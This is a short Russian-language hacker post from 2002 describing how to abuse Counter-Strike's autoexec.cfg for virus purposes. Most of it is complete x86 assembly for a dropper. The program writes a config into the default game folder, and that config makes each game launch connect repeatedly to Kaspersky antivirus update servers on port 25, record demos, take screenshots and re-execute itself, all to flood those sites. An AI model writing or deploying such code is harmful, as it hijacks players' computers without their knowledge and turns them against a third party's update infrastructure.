Я уже можно сказать очень давно играю в эту игру и однажды в голову мне пришла идея о том, что эту игру можно использовать в вирусных целях. :) Для информациии кто не знает про эту игрушку могу лишь сказать, что эта игра можно сказать самая распространенная игра в мире! И вот что что можно полезного из нее извлечь, но все дело в том что мы будем использовать просто комманды консоли :)
При запуске нашей игры, игрушка проверяет ноличие файла autoexec.cfg в в папке игры, если он есть то автоматически выполняются комманды, котолрые были записаны в нем. Так вот можно написать вирус, который бы и использовал эту игру к примеру для флудинга апдейт сайтов АВП. Вот пример маленький примерчик: Создает в директории c:\Sierra\counter-strike\cstrike\ файл autoexec.cfg (директория по умолчанию, у 99 процентов всех игорокв он именно такая) !!Это просто пример!! Меняем порт на 25 и пробуем подключиться к сайтам. Далее начинает записываеть демку и делает скриншот, а после этого все повторяет сначала... .386p .model flat,STDCALL extrn ExitProcess:proc extrn CreateFileA:proc extrn WriteFile:proc extrn CloseHandle:proc .data num_bytes dd ? ;Директория по умолчанию: filename db 'c:\Sierra\counter-strike\cstrike\autoexec.cfg',0 ; Наш конфиг: reg: db '\port 25',13,10 db '\connect http://downloads-us1.kaspersky-labs.com/updates',13,10 db '\connect http://updates1.kaspersky-labs.com/updates',13,10 db '\record configuration',13,10 db '\screenshot',13,10 db '\exec autoexec.cfg',13,10 regs: filesize equ regs - reg .code start: push 0 push 00000080h push 2 push 0 push 1 push 40000000h push offset filename call CreateFileA push EAX push 0 push offset num_bytes push filesize push offset reg push EAX Call WriteFile Call CloseHandle push 0 call ExitProcess end start Это все.! 10.08.02 |